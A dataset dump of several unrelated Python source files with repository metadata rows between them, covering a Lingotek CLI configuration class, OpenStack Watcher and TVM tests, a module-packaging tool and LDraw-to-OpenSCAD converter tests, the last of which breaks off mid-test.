self.host, self.project_id, self.project_name, self.path, self.community_id, self.workflow_id, self.locale, self.clone_option, self.finalized_file, self.auto_format_option,
download_dir, watch_locales, locale_folders_str, git_output, self.append_option)) """
table = [
["Host", self.host],
["Lingotek Project", '{0} ({1})'.format(self.project_id, self.project_name)],
["Local Project Path", self.path],
["Community ID", self.community_id],
["Workflow ID", self.workflow_id],
["Default Source Locale", self.locale],
["Always Check Latest Document", self.always_check_latest_doc],
["Clone Option", self.clone_option],
["Download Finalized Files", self.finalized_file],
["Auto Format", self.auto_format_option],
["Default Download Folder", download_dir],
["Target Locales", watch_locales],
["Target Locale Folders", locale_folders_str],
["Git Auto-commit", git_output],
["Append Option", self.append_option.title()],
["Metadata Wizard Fields", ",\n".join(self.metadata_fields)],
["Always Prompt for Metadata", "on" if self.metadata_prompt else "off"],
["Default Metadata", "\n".join("{}:{}".format(key, value) for key, value in self.default_metadata.items())]
]
if self.finalized_file == 'on':
table.append(["Unzip Finalized File", self.unzip_file])
print("Configuration Options")
print(tabulate(table))
self.print_config = True
def remove_locales(self, clear_locales):
log_info = "Removed all locale specific download folders."
self.locale_folders = {}
locale_folders_str = json.dumps(self.locale_folders)
self.update_config_file('locale_folders', locale_folders_str, self.conf_parser, self.config_file_name, log_info)
def set_append_option(self, append_option):
self.print_config = True
self.append_option = append_option
if append_option in {'none', 'full'} or append_option[:append_option.find(':')+1] in {'number:', 'name:'}:
set_option = True
if append_option[:3] == 'num':
try: int(append_option[7:])
except ValueError:
logger.warning('Error: Input after "number" must be an integer')
self.print_config = False
elif append_option[:4] == 'name' and len(append_option) <= 5:
logger.warning('Error: No input given after "name"')
self.print_config = False
if not self.conf_parser.has_option('main', 'append_option'):
self.update_config_file('append_option', 'none', self.conf_parser, self.config_file_name, 'Update: Added optional file location appending (ltk config --help)')
if self.print_config:
log_info = 'Append option set to ' + append_option
self.update_config_file('append_option', append_option, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-a" / "--append_option": Must be one of "none", "full", "number:", or "name:"')
self.print_config = False
def set_auto_format_option(self, auto_format_option):
log_info = 'Turned auto format '+auto_format_option
if auto_format_option == 'on':
self.auto_format_option = 'on'
self.update_config_file('auto_format', auto_format_option, self.conf_parser, self.config_file_name, log_info)
elif auto_format_option == 'off':
self.auto_format_option = 'off'
self.update_config_file('auto_format', auto_format_option, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-f" / "--auto_format": Must be either "on" or "off"')
print_config = False
def set_clone_option(self, clone_option, print_info=True):
self.clone_action = clone_option
if print_info:
log_info = 'Turned clone '+clone_option
else:
log_info = ''
if clone_option == 'on':
download_option = 'clone'
self.download_option = download_option
self.update_config_file('clone_option', clone_option, self.conf_parser, self.config_file_name, log_info)
self.update_config_file('download_option', download_option, self.conf_parser, self.config_file_name, '')
elif clone_option == 'off':
if self.download_dir == '':
new_download_option = 'same'
self.download_option = new_download_option
self.update_config_file('clone_option', clone_option, self.conf_parser, self.config_file_name, log_info)
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, '')
self.update_config_file('download_folder', self.download_dir, self.conf_parser, self.config_file_name, '')
else:
new_download_option = 'folder'
self.download_option = new_download_option
self.update_config_file('clone_option', clone_option, self.conf_parser, self.config_file_name, log_info)
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, '')
else:
logger.warning('Error: Invalid value for "-c" / "--clone_option": Must be either "on" or "off"')
print_config = False
def set_always_check_latest_doc(self, always_check_latest_doc_option, print_info=True):
if print_info:
log_info = 'Turned always check latest document ' + always_check_latest_doc_option
else:
log_info = ''
if always_check_latest_doc_option == 'on' or always_check_latest_doc_option == 'off':
self.update_config_file('always_check_latest_doc', always_check_latest_doc_option, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-ld" / "--latest_document": Must be either "on" or "off"')
def set_finalized_file_option(self, finalized_file, print_info=True):
if finalized_file:
finalized_file = finalized_file.lower()
if print_info:
log_info = 'Turned finalized file download ' + finalized_file
else:
log_info = ''
if finalized_file == 'on' or finalized_file == 'off':
self.finalized_file = finalized_file
self.update_config_file('finalized_file', finalized_file, self.conf_parser, self.config_file_name, log_info)
if self.finalized_file == 'on':
unzip_file = self.prompt_unzip_file_option()
self.set_unzip_file_option(unzip_file)
else:
logger.warning('Error: Invalid value for "-ff" / "--finalized_file": Must be either "on" or "off"')
self.print_config = False
def prompt_unzip_file_option(self):
unzip_file = 'on'
try:
confirm = 'none'
while confirm not in ['on', 'On', 'ON', 'off', 'Off', '']:
prompt_message = 'Would you like to turn finalized file UNZIP on or off? [ON/off]: '
# Python 2
confirm = raw_input(prompt_message)
# End Python 2
# Python 3
# confirm = input(prompt_message)
# End Python 3
if confirm in ['on', 'On', 'ON', 'off', 'Off', '']:
if confirm in ['on', 'On', 'ON', '']:
unzip_file = 'on'
else:
unzip_file = 'off'
except KeyboardInterrupt:
# Python 2
logger.info("\nInit canceled")
# End Python 2
# Python 3
# logger.error("\nInit canceled")
# End Python 3
return
return unzip_file
def set_unzip_file_option(self, unzip_file, print_info=True):
if unzip_file:
unzip_file = unzip_file.lower()
if print_info:
log_info = 'Turned finalized file unzip ' + unzip_file
else:
log_info = ''
if unzip_file == 'on' or unzip_file == 'off':
self.unzip_file = unzip_file
self.update_config_file('unzip_file', unzip_file, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-u" / "--unzip_file": Must be either "on" or "off"')
self.print_config = False
def set_download_folder(self, download_folder):
if download_folder == '--none':
if self.download_dir == "":
pass
else:
new_download_option = 'same'
self.download_option = new_download_option
self.update_config_file('download_folder',"", self.conf_parser, self.config_file_name, "")
if self.download_option != 'clone':
if self.watch_locales != None and len(self.locale_folders) != 0:
new_download_option = 'folder'
else:
new_download_option = 'same'
self.download_option = new_download_option
log_info = 'Removed download folder'
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, log_info)
else:
download_path = self.norm_path(download_folder)
if os.path.exists(os.path.join(self.path,download_path)):
self.download_dir = download_path
log_info = 'Set download folder to {0}'.format(download_path)
self.update_config_file('download_folder', download_path, self.conf_parser, self.config_file_name, log_info)
if self.download_option != 'clone':
new_download_option = 'folder'
self.download_option = new_download_option
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, "")
else:
logger.warning('Error: Invalid value for "-d" / "--download_folder": The folder {0} does not exist'.format(os.path.join(self.path,download_path)))
print_config = False
def set_git_autocommit(self, git_autocommit):
# if self.git_autocommit == 'True' or self.git_auto.repo_exists(self.path):
# log_info = 'Git auto-commit status changed from {0}active'.format(
# ('active to in' if self.git_autocommit == "True" else 'inactive to '))
# config_file = open(self.config_file_name, 'w')
# if self.git_autocommit == "True":
# self.update_config_file('git_autocommit', 'False', self.conf_parser, self.config_file_name, log_info)
# self.git_autocommit = "False"
# else:
# self.update_config_file('git_autocommit', 'True', self.conf_parser, self.config_file_name, log_info)
# self.git_autocommit = "True"
self.git_autocommit = git_autocommit
log_info = 'Turned git auto-commit ' + git_autocommit
if git_autocommit in ['on', 'off']:
self.update_config_file('git_autocommit', git_autocommit, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-g" / "--clone_option": Must be either "on" or "off"')
print_config = False
def set_git_credentials(self):
if "nt" not in os.name:
# Python 2
git_username = raw_input('Username (Username and password are not required if SSH is enabled): ')
# End Python 2
# Python 3
# git_username = input('Username (Username and password are not required if SSH is enabled): ')
# End Python 3
git_password = getpass.getpass()
if git_username in ['None', 'none', 'N', 'n', '--none']:
git_username = ""
log_info = "Git username disabled"
else:
log_info = 'Git username set to ' + git_username
self.update_config_file('git_username', git_username, self.conf_parser, self.config_file_name, log_info)
if git_password in ['None', 'none', 'N', 'n', '--none']:
git_password = ""
log_info = "Git password disabled"
else:
log_info = 'Git password set'
self.update_config_file('git_password', self.git_auto.encrypt(git_password), self.conf_parser, self.config_file_name, log_info)
else:
error("Only SSH Key access is enabled on Windows")
git_username = ""
git_password = ""
def set_locale(self, locale):
self.locale = locale
log_info = 'Project default locale has been updated to {0}'.format(self.locale)
self.update_config_file('default_locale', locale, self.conf_parser, self.config_file_name, log_info)
def set_locale_folder(self, locale_folders):
count = 0
folders_count = len(locale_folders)
folders_string = ""
log_info = ""
mult_folders = False
for folder in locale_folders:
count += 1
if not folder[0] or not folder[1]:
logger.warning("Please specify a valid locale and a directory for that locale.")
print_config = False
continue
locale = folder[0].replace("-","_")
if not is_valid_locale(self.api, locale):
logger.warning(str(locale+' is not a valid locale. See "ltk list -l" for the list of valid locales'))
print_config = False
continue
if folder[1] == '--none':
folders_count -= 1
if locale in self.locale_folders:
self.locale_folders.pop(locale, None)
logger.info("Removing download folder for locale "+str(locale)+"\n")
else:
logger.info("The locale "+str(locale)+" already has no download folder.\n")
print_config = False
continue
path = self.norm_path(os.path.abspath(folder[1]))
if os.path.exists(os.path.join(self.path,path)):
taken_locale = self.is_locale_folder_taken(locale, path)
if taken_locale:
logger.info("The folder "+str(path)+" is already taken by the locale "+str(taken_locale)+".\n")
print_config = False
continue
else:
# print("path of new locale folder: "+path)
self.locale_folders[locale] = path
else:
logger.warning('Error: Invalid value for "-p" / "--locale_folder": Path "'+path+'" does not exist')
print_config = False
continue
folders_string += str(locale) + ": " + str(path)
if count < len(locale_folders):
folders_string += ", "
if len(folders_string):
if folders_count > 1:
log_info = 'Adding locale folders {0}'.format(folders_string)
else:
log_info = 'Adding locale folder for {0}'.format(folders_string)
locale_folders_str = json.dumps(self.locale_folders)
self.update_config_file('locale_folders', locale_folders_str, self.conf_parser, self.config_file_name, log_info)
def set_target_locales(self, target_locales):
locales = []
print(target_locales)
for locale in target_locales:
locales.extend(locale.split(','))
if len(locales) > 0 and (locales[0].lower() == 'none' or locales[0].lower() == '--none'):
log_info = 'Removing all target locales'
self.update_config_file('watch_locales', '', self.conf_parser, self.config_file_name, log_info)
else:
target_locales = get_valid_locales(self.api,locales,'added')
target_locales_str = ','.join(target for target in target_locales)
if len(target_locales_str) > 0:
log_info = 'Set target locales to {0}'.format(target_locales_str)
self.update_config_file('watch_locales', target_locales_str, self.conf_parser, self.config_file_name, log_info)
self.watch_locales = target_locales
def set_workflow_id(self, workflow_id):
self.workflow_id = workflow_id
log_info = 'Workflow used to upload content has been changed to {0}.'.format(workflow_id)
self.update_config_file('workflow_id', workflow_id, self.conf_parser, self.config_file_name, log_info)
self.conf_parser.set('main', 'workflow_id', workflow_id)
def update_config_parser_info(self):
# clone_option = self.conf_parser.get('main', 'clone_option')
# download_folder = self.conf_parser.get('main', 'download_folder')
# download_option = self.conf_parser.get('main', 'download_option')
# if 'download_option' == 'same' or (clone_option == "off" and download_folder == "null"):
# self.update_config_file('download_option', 'folder', self.conf_parser, self.config_file_name, "")
if not self.conf_parser.has_option('main', 'git_autocommit'):
self.update_config_file('git_autocommit', 'False', self.conf_parser, self.config_file_name, 'Update: Added \'git auto-commit\' option (ltk config --help)')
self.update_config_file('git_username', '', self.conf_parser, self.config_file_name, 'Update: Added \'git username\' option (ltk config --help)')
self.update_config_file('git_password', '', self.conf_parser, self.config_file_name, 'Update: Added \'git password\' option (ltk config --help)')
self.git_autocommit = self.conf_parser.get('main', 'git_autocommit')
def set_metadata_defaults(self):
self.default_metadata = self.metadata_wizard(set_defaults=True)
self.update_config_file('default_metadata', json.dumps(self.default_metadata), self.conf_parser, self.config_file_name, "Updated default metadata to {0}".format(self.default_metadata))
def set_metadata_prompt(self, option):
if option.lower() == 'on':
self.metadata_prompt = True
self.update_config_file('metadata_prompt', 'on', self.conf_parser, self.config_file_name, 'Update: Metadata prompt set to ON')
elif option.lower() == 'off':
self.metadata_prompt = False
self.update_config_file('metadata_prompt', 'off', self.conf_parser, self.config_file_name, 'Update: Metadata prompt set to OFF')
else:
logger.warning("The flag for the metadata prompt only takes the arguments 'on' or 'off'")
def set_metadata_fields(self, fields):
if fields.lower() == 'all':
self.metadata_fields = METADATA_FIELDS
else:
new_fields = fields.split(",")
if len(new_fields) == 0 or fields.isspace():
logger.error("You must set at least one field")
return
for field in new_fields:
if field not in METADATA_FIELDS:
logger.warning("{0} is not a valid metadata field".format(field))
return
self.metadata_fields = new_fields
self.update_config_file('metadata_fields', json.dumps(self.metadata_fields), self.conf_parser, self.config_file_name, "Updated metadata wizard fields to {0}".format(self.metadata_fields)) | 54.028384 | 274 | 0.60982 |
acf6c805c77628d5255b7f28916b6757a115cd12 | 1,947 | py | Python | python-watcher-2.0.0/watcher/tests/applier/test_rpcapi.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | null | null | null | python-watcher-2.0.0/watcher/tests/applier/test_rpcapi.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | python-watcher-2.0.0/watcher/tests/applier/test_rpcapi.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # -*- encoding: utf-8 -*-
# Copyright (c) 2015 b<>com
#
# Authors: Jean-Emile DARTOIS <jean-emile.dartois@b-com.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import mock
import oslo_messaging as om
from watcher.applier import rpcapi
from watcher.common import exception
from watcher.common import utils
from watcher.tests import base
class TestApplierAPI(base.TestCase):
api = rpcapi.ApplierAPI()
def test_get_api_version(self):
with mock.patch.object(om.RPCClient, 'call') as mock_call:
expected_context = self.context
self.api.check_api_version(expected_context)
mock_call.assert_called_once_with(
expected_context,
'check_api_version',
api_version=rpcapi.ApplierAPI().API_VERSION)
def test_execute_audit_without_error(self):
with mock.patch.object(om.RPCClient, 'cast') as mock_cast:
action_plan_uuid = utils.generate_uuid()
self.api.launch_action_plan(self.context, action_plan_uuid)
mock_cast.assert_called_once_with(
self.context,
'launch_action_plan',
action_plan_uuid=action_plan_uuid)
def test_execute_action_plan_throw_exception(self):
action_plan_uuid = "uuid"
self.assertRaises(exception.InvalidUuidOrName,
self.api.launch_action_plan,
action_plan_uuid)
| 34.767857 | 71 | 0.691834 |
acf6c8c50aff9841b8bb031ffdb01db1afb46aa4 | 1,513 | py | Python | tests/python/relay/test_pass_profiler.py | eleflea/tvm | d199243d8907b2d8062dd9c20b69dcb9765a970f | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 40 | 2021-06-14T23:14:46.000Z | 2022-03-21T14:32:23.000Z | tests/python/relay/test_pass_profiler.py | eleflea/tvm | d199243d8907b2d8062dd9c20b69dcb9765a970f | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 14 | 2021-06-08T03:15:54.000Z | 2022-02-01T23:50:24.000Z | tests/python/relay/test_pass_profiler.py | eleflea/tvm | d199243d8907b2d8062dd9c20b69dcb9765a970f | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 11 | 2021-06-14T05:56:18.000Z | 2022-02-27T06:52:07.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import tvm.relay
from tvm.relay import op
def test_pass_profiler():
x, y, z = [tvm.relay.var(c, shape=(3, 4), dtype="float32") for c in "xyz"]
e1 = op.add(x, y)
e2 = op.subtract(x, z)
e3 = op.multiply(e1, e1 / e2)
mod = tvm.IRModule.from_expr(e3 + e2)
tvm.transform.enable_pass_profiling()
mod = tvm.relay.transform.AnnotateSpans()(mod)
mod = tvm.relay.transform.ToANormalForm()(mod)
mod = tvm.relay.transform.InferType()(mod)
profiles = tvm.transform.render_pass_profiles()
assert "AnnotateSpans" in profiles
assert "ToANormalForm" in profiles
assert "InferType" in profiles
tvm.transform.clear_pass_profiles()
tvm.transform.disable_pass_profiling()
| 36.02381 | 78 | 0.731659 |
acf6c92383a1f136c194d282b833ad41d8d32599 | 613 | py | Python | kao_fn/function_metadata.py | cloew/KaoFn | e9e0742c9a46e6dc749e48a684ed7c4f82a06173 | [
"MIT"
] | null | null | null | kao_fn/function_metadata.py | cloew/KaoFn | e9e0742c9a46e6dc749e48a684ed7c4f82a06173 | [
"MIT"
] | null | null | null | kao_fn/function_metadata.py | cloew/KaoFn | e9e0742c9a46e6dc749e48a684ed7c4f82a06173 | [
"MIT"
] | null | null | null | from .smart_arg import SmartArg
import inspect
class FunctionMetadata:
""" Represents a functions metadata """
def __init__(self, func):
""" Initialize the metadata """
args, varargs, keywords, defaults = inspect.getargspec(func)
self.argNameToIndex = {arg:args.index(arg) for arg in args}
self.nameToDefaultValue = dict(zip(reversed(args), reversed(defaults))) if defaults is not None else {}
self.args = [SmartArg(arg, self.argNameToIndex[arg]) for arg in args]
self.nameToArg = {arg.argName:arg for arg in self.args} | 40.866667 | 112 | 0.646003 |
acf6ca6881f627ab8f80fa2979c2dab0c6e95cc7 | 6,726 | py | Python | client/package.py | mikaelbrandin/armory | 222e549fbf2cf89a874cad96a8bb7edd186e4800 | [
"Apache-2.0"
] | null | null | null | client/package.py | mikaelbrandin/armory | 222e549fbf2cf89a874cad96a8bb7edd186e4800 | [
"Apache-2.0"
] | null | null | null | client/package.py | mikaelbrandin/armory | 222e549fbf2cf89a874cad96a8bb7edd186e4800 | [
"Apache-2.0"
] | null | null | null | __author__ = 'kra869'
import hashlib
import os
import tarfile
import shutil
import datetime
import tempfile
import glob
from . import utils
import configparser
from . import configurations
class PackageException(BaseException):
def __init__(self, msg):
self.msg = msg
def init(context):
parser = context.register_command('package', command_package, help='Package a module or configurations')
parser.add_argument('sources', metavar='DIRECTORY', nargs='+', help='TBD')
parser.add_argument('--file', '-f', metavar='FILE', help='Write package to FILE')
return None
def command_package(args, context):
modules = context.modules.from_context(context)
for src in args.sources:
if src in modules:
package_module(args, context, modules[src])
elif os.path.exists(src) and os.path.isdir(src):
if not src.endswith(os.sep):
src = src + os.sep
dir = src
for file in glob.glob(dir + '*.info'):
info = configparser.SafeConfigParser()
info.read(file)
name = os.path.splitext(os.path.basename(file))[0]
# name =
print("Packaging " + name)
if info.has_option("general", "type") and info.get('general', 'type') == 'configuration':
package_config(args, name, info, configurations.Configuration(configurations.to_name(name), dir, context))
else:
package_module(args, name, info, modules.Module(name, dir, context))
# module =
# package_module(args, context, module)
else:
raise PackageException("Missing source, nothing to package")
# for mod_name in included:
# commit(args, context, modules[mod_name])
def package_config(args, context, info, config):
version = info.get('general', 'version')
if not info.has_option('general', 'version'):
raise PackageException('No version, please provide a valid version tag in config .info file for ' + config.name)
print(config.name + "(" + version + ") from " + config.conf_directory)
# Create temporary directory
dir = tempfile.mkdtemp('am-package') + os.sep
if not os.path.exists(dir):
os.makedirs(dir);
tmp_pack = dir + config.name + '.pack'
tmp_manifest = dir + 'MANIFEST'
tmp_metainfo = dir + 'METAINF'
# Create MANIFEST
package_hash = hashlib.sha1()
with open(tmp_manifest, 'w+') as manifest:
for root, dirs, files in os.walk(config.conf_directory, topdown=False):
for name in files:
f = os.path.join(root, name)
rel = os.path.relpath(f, config.conf_directory)
hv = utils.hash_file(f)
print(" " + hv + "\t" + rel)
data = rel + " sha1 " + hv
data = data.encode('utf-8')
package_hash.update(data)
manifest.write(rel + " sha1 " + hv + "\n")
package_hash = package_hash.hexdigest()
# Create METAINF
metainfo = configparser.SafeConfigParser()
metainfo.add_section('meta')
metainfo.set('meta', 'name', config.name)
metainfo.set('meta', 'friendly_name', config.friendly_name)
metainfo.set('meta', 'hash', package_hash)
metainfo.set('meta', 'hash_type', 'sha1')
metainfo.set('meta', 'type', 'configuration')
metainfo.set('meta', 'built', str(datetime.datetime.now()))
metainfo.set('meta', 'built_by', os.getlogin())
metainfo.set('meta', 'version', version)
with open(tmp_metainfo, 'w+') as f:
metainfo.write(f)
# Last create .pack file in temporary dir
with tarfile.open(tmp_pack, 'w') as pack:
for entry in os.listdir(config.conf_directory):
pack.add(config.conf_directory + entry, arcname=entry)
pack.add(tmp_manifest, 'MANIFEST')
pack.add(tmp_metainfo, 'METAINF')
#
# Copy file to cwd or argument --file destination
#
_dest = os.getcwd() + os.sep + config.name + '-' + version + '.pack'
if 'file' in args and args.file is not None:
_dest = args.file
shutil.copyfile(tmp_pack, _dest)
#
# Remove temporary dir
#
shutil.rmtree(dir)
pass
def package_module(args, context, info, module):
version = info.get('general', 'version')
if not info.has_option('general', 'version'):
raise PackageException('No version, please provide a valid version tag in module .info file for ' + module.name)
print(module.name + "(" + version + ") from " + module.module_directory)
# Create temporary directory
dir = tempfile.mkdtemp('am-package') + os.sep
if not os.path.exists(dir):
os.makedirs(dir);
tmp_pack = dir + module.name + '.pack'
tmp_manifest = dir + 'MANIFEST'
tmp_metainfo = dir + 'METAINF'
# Create MANIFEST
package_hash = hashlib.sha1()
with open(tmp_manifest, 'w+') as manifest:
for root, dirs, files in os.walk(module.module_directory, topdown=False):
for name in files:
f = os.path.join(root, name)
rel = os.path.relpath(f, module.module_directory)
hv = utils.hash_file(f)
print(hv + "\t" + rel)
data = rel + " sha1 " + hv
data = data.encode('utf-8')
package_hash.update(data)
manifest.write(rel + " sha1 " + hv + "\n")
package_hash = package_hash.hexdigest();
# Create METAINF
metainfo = configparser.SafeConfigParser()
metainfo.add_section('meta')
metainfo.set('meta', 'name', module.name)
metainfo.set('meta', 'friendly_name', module.friendly_name)
metainfo.set('meta', 'hash', package_hash)
metainfo.set('meta', 'hash_type', 'sha1')
metainfo.set('meta', 'type', 'module')
metainfo.set('meta', 'built', str(datetime.datetime.now()))
metainfo.set('meta', 'built_by', os.getlogin())
metainfo.set('meta', 'version', version);
with open(tmp_metainfo, 'w+') as f:
metainfo.write(f)
# Last create .pack file in temporary dir
with tarfile.open(tmp_pack, 'w') as pack:
for entry in os.listdir(module.module_directory):
pack.add(module.module_directory + entry, arcname=entry)
pack.add(tmp_manifest, 'MANIFEST')
pack.add(tmp_metainfo, 'METAINF')
# Copy file to cwd or argument --file destination
dest = os.getcwd() + os.sep + module.name + '-' + version + '.pack'
if 'file' in args and args.file != None:
dest = args.file
shutil.copyfile(tmp_pack, dest)
# Remove temporary dir
shutil.rmtree(dir)
pass
| 33.133005 | 126 | 0.60898 |
acf6cb61d43d92b187aad970fa65d799432e44cb | 12,972 | py | Python | test_ldraw_to_scad.py | orionrobots/ldraw-to-scad | ed9ee512d46547671c685cf434e72daa1c8484a2 | [
"Apache-2.0"
] | 4 | 2019-02-09T21:41:57.000Z | 2021-01-18T22:09:23.000Z | test_ldraw_to_scad.py | orionrobots/ldraw-to-scad | ed9ee512d46547671c685cf434e72daa1c8484a2 | [
"Apache-2.0"
] | null | null | null | test_ldraw_to_scad.py | orionrobots/ldraw-to-scad | ed9ee512d46547671c685cf434e72daa1c8484a2 | [
"Apache-2.0"
] | 1 | 2021-01-18T22:09:30.000Z | 2021-01-18T22:09:30.000Z | from unittest import TestCase
import mock
import os
from ldraw_to_scad import LDrawConverter, Module
class TestModule(TestCase):
def default_runner(self, filename='a_module'):
return Module(filename=filename)
def test_it_should_make_sensible_module_names(self):
# Module names must be valid c identifiers -
# setup
module_names_to_convert = [
["stud.dat", "n__stud"],
["s\\stuff.dat", "n__s__stuff"],
["4744.dat", "n__4744"],
["2-4cyli.dat", "n__2_4cyli"]
]
# test
# assert
for item, expected in module_names_to_convert:
self.assertEqual(Module.make_module_name(item), expected)
class TestLDrawConverter(TestCase):
def default_runner(self, module_filename="__main__"):
module = Module(module_filename)
return LDrawConverter(), module
def test_it_should_convert_comments(self):
# setup
part_lines_to_test =[
["0 Stud", "// Stud"],
["0", "// "]
]
converter, module = self.default_runner()
converter.current_module = module
# Test
# Assert
for line, expected in part_lines_to_test:
output_scad = converter.convert_line(line)
self.assertEqual(output_scad, [expected])
def test_it_should_convert_type_1_line_into_module_ref(self):
# setup
# This is a silly matrix - but the components are easy to pick out
# 1 <colour> x y z a b c d e f g h i <file>
part_line = "1 16 25 24 23 22 21 20 19 18 17 16 15 14 simple_test.dat"
converter, module = self.default_runner()
# Test
converter.current_module = module
result = converter.convert_line(part_line)
# Assert
print(module.dependancies)
self.assertIn('n__simple_test', module.dependancies)
self.assertEqual(result, [
"color(lego_colours[16])",
" multmatrix([",
" [22, 21, 20, 25],",
" [19, 18, 17, 24],",
" [16, 15, 14, 23],",
" [0, 0, 0, 1]",
" ])",
" n__simple_test();"
])
def test_it_should_ignore_type_2_line(self):
# setup
part_line = "2 24 40 96 -20 -40 96 -20"
converter, module = self.default_runner()
# test
converter.current_module = module
output_scad = converter.convert_line(part_line)
# assert
self.assertEqual(output_scad, [])
# With indent
output_scad = converter.convert_line(part_line, indent=2)
# assert
self.assertEqual(output_scad, [])
def test_it_should_render_type_3_tri(self):
# setup
part_line = "3 16 -2.017 -35.943 0 0 -35.942 -3.6 2.017 -35.943 0"
converter, module = self.default_runner()
# test
converter.current_module = module
output_scad = converter.convert_line(part_line)
# assert
self.assertEqual(output_scad, [
"color(lego_colours[16])",
" polyhedron(points=[",
" [-2.017, -35.943, 0],",
" [0, -35.942, -3.6],",
" [2.017, -35.943, 0]",
" ], faces = [[0, 1, 2]]);"
])
# test with indent
output_scad = converter.convert_line(part_line, indent=2)
# assert
self.assertEqual(output_scad, [
" color(lego_colours[16])",
" polyhedron(points=[",
" [-2.017, -35.943, 0],",
" [0, -35.942, -3.6],",
" [2.017, -35.943, 0]",
" ], faces = [[0, 1, 2]]);"
])
def test_it_should_render_a_quad(self):
# setup
part_line = "4 16 1 1 0 0.9239 1 0.3827 0.9239 0 0.3827 1 0 0"
converter, module = self.default_runner()
# Test
converter.current_module = module
output_scad = converter.convert_line(part_line)
# Assert
self.assertEqual(output_scad, [
"color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 0],",
" [0.9239, 1, 0.3827],",
" [0.9239, 0, 0.3827],",
" [1, 0, 0]",
" ], faces = [[0, 1, 2, 3]]);"
])
def test_it_should_be_able_to_find_part_path(self):
# WARNING: This test requires having lib/ldraw setup.
# setup
# part tests - name, expected location
part_tests = [
['1.dat', os.path.join('lib', 'ldraw', 'parts', '1.dat')],
['4-4cyli.dat', os.path.join('lib', 'ldraw', 'p', '4-4cyli.dat')],
['s\\4744s01.dat', os.path.join('lib', 'ldraw', 'parts', 's', '4744s01.dat')]
]
# Test
converter, module = self.default_runner()
converter.index_library()
# Assert
for part_name, expected_path in part_tests:
self.assertEqual(converter.find_part(part_name), expected_path)
def test_it_should_ignore_the_optional_line(self):
# setup
part_line = "5 24 0.7071 0 -0.7071 0.7071 1 -0.7071 0.9239 0 -0.3827 0.3827 0 -0.9239"
# test
converter, module = self.default_runner()
converter.current_module = module
output_scad = converter.convert_line(part_line)
# assert
self.assertEqual(output_scad, [])
def test_multiple_lines(self):
# setup
lines = [
"0 Cylinder 1.0",
"0 Name: 4-4cyli.dat",
"4 16 1 1 0 0.9239 1 0.3827 0.9239 0 0.3827 1 0 0",
"5 24 1 0 0 1 1 0 0.9239 0 0.3827 0.9239 0 -0.3827",
"4 16 0.9239 1 0.3827 0.7071 1 0.7071 0.7071 0 0.7071 0.9239 0 0.3827",
"5 24 0.9239 0 0.3827 0.9239 1 0.3827 0.7071 0 0.7071 1 0 0",
"4 16 0.7071 1 0.7071 0.3827 1 0.9239 0.3827 0 0.9239 0.7071 0 0.7071",
]
# Test
converter, module = self.default_runner()
converter.process_lines(module, lines)
# Assert
self.assertEqual(module.lines, [
"// Cylinder 1.0",
"// Name: 4-4cyli.dat",
"color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 0],",
" [0.9239, 1, 0.3827],",
" [0.9239, 0, 0.3827],",
" [1, 0, 0]",
" ], faces = [[0, 1, 2, 3]]);",
"color(lego_colours[16])",
" polyhedron(points=[",
" [0.9239, 1, 0.3827],",
" [0.7071, 1, 0.7071],",
" [0.7071, 0, 0.7071],",
" [0.9239, 0, 0.3827]",
" ], faces = [[0, 1, 2, 3]]);",
"color(lego_colours[16])",
" polyhedron(points=[",
" [0.7071, 1, 0.7071],",
" [0.3827, 1, 0.9239],",
" [0.3827, 0, 0.9239],",
" [0.7071, 0, 0.7071]",
" ], faces = [[0, 1, 2, 3]]);",
])
def test_reading_file(self):
# Setup
test_file = "simple_test.dat"
# test
converter, _ = self.default_runner()
with open(test_file) as fd:
lines = fd.readlines()
output = converter.process_main(lines)
# assert
self.assertEqual(output, [
"// Simple Test File",
"// Name: simple_test.dat",
"",
"color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 1],",
" [1, 1, -1],",
" [-1, 1, -1],",
" [-1, 1, 1]",
" ], faces = [[0, 1, 2, 3]]);",
""
])
def test_it_process_type_1_line_into_module(self):
# setup
part_lines = ["1 16 25 24 23 22 21 20 19 18 17 16 15 14 simple_test.dat"]
